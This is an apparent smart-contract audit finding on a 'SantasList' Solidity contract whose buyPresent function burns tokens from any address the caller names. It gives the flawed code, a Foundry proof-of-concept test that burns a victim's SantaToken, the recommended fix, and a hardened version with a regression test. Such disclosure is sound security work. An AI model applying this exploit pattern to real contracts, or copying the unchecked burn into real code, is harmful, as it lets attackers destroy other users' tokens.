Any address can call `buyPresent(address presentReceiver)` and burn `presentReceiver`'s SantaToken, obtaining a present for free at the victim's expense.
```solidity
function buyPresent(address presentReceiver) external {
    // @>> burns tokens of an arbitrary address chosen by the caller, not msg.sender
    i_santaToken.burn(presentReceiver);
    _mintAndIncrement();
}
```
```solidity
function testCanBuyPresentWithAnotherAddressesToken() public {
    // Santa gives the userToGetBurned address the EXTRA_NICE status and therefore
    // the ability to collect an NFT and SantaToken.
    vm.startPrank(santa);
    santasList.checkList(userToGetBurned, SantasList.Status.EXTRA_NICE);
    santasList.checkTwice(userToGetBurned, SantasList.Status.EXTRA_NICE);
    vm.stopPrank();

    vm.warp(santasList.CHRISTMAS_2023_BLOCK_TIME() + 1);

    // userToGetBurned collects its present and receives SantaToken
    vm.startPrank(userToGetBurned);
    santasList.collectPresent();
    uint256 balanceUserToGetBurnedTokenBefore = santaToken.balanceOf(userToGetBurned);
    vm.stopPrank();

    // user buys a present with userToGetBurned's tokens
    vm.startPrank(user);
    santasList.buyPresent(userToGetBurned);
    vm.stopPrank();

    uint256 balanceUserToGetBurnedAfter = santaToken.balanceOf(userToGetBurned);
    // SantaToken minted to EXTRA_NICE addresses is 1e18 and the burn "cost" is 1e18 as well
    assertEq(balanceUserToGetBurnedAfter, balanceUserToGetBurnedTokenBefore - 1e18);
}
```
Tools used: Foundry.
`i_santaToken.burn(presentReceiver)` should be changed to `i_santaToken.burn(msg.sender)` so that the caller burns their own tokens and cannot burn someone else's.
Furthermore, it would be useful to transfer the NFT to the present receiver right away.
The current implementation allows a malicious actor to burn someone else's tokens, because the burn function does not check for any approval from the token holder.
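A hardened `buyPresent` together with a Foundry regression test, added here as an example; this is not the project's code. It assumes the fixture names used in the PoC above, a hypothetical `_mintAndIncrementTo(address)` helper that mints the NFT to an explicit receiver, and that `SantaToken.burn` reverts when the target holds no balance.

```solidity
// Hardened buyPresent (added example, not the project's code): burn only the caller's
// own SantaToken and mint the present NFT directly to presentReceiver.
function buyPresent(address presentReceiver) external {
    // Burn from msg.sender, never from an address supplied by the caller.
    i_santaToken.burn(msg.sender);
    // Hypothetical helper: mints to presentReceiver instead of msg.sender.
    _mintAndIncrementTo(presentReceiver);
}

// Foundry regression test (added example) using the same fixtures as the PoC above.
function testCannotBurnAnotherAddressesToken() public {
    vm.startPrank(santa);
    santasList.checkList(userToGetBurned, SantasList.Status.EXTRA_NICE);
    santasList.checkTwice(userToGetBurned, SantasList.Status.EXTRA_NICE);
    vm.stopPrank();

    vm.warp(santasList.CHRISTMAS_2023_BLOCK_TIME() + 1);

    // userToGetBurned collects its present and receives SantaToken.
    vm.startPrank(userToGetBurned);
    santasList.collectPresent();
    vm.stopPrank();
    uint256 balanceBefore = santaToken.balanceOf(userToGetBurned);

    // user holds no SantaToken, so burning from msg.sender must revert
    // (assumes the token's burn reverts on insufficient balance).
    vm.startPrank(user);
    vm.expectRevert();
    santasList.buyPresent(userToGetBurned);
    vm.stopPrank();

    // The victim's balance is untouched by the failed purchase.
    assertEq(santaToken.balanceOf(userToGetBurned), balanceBefore);
}
```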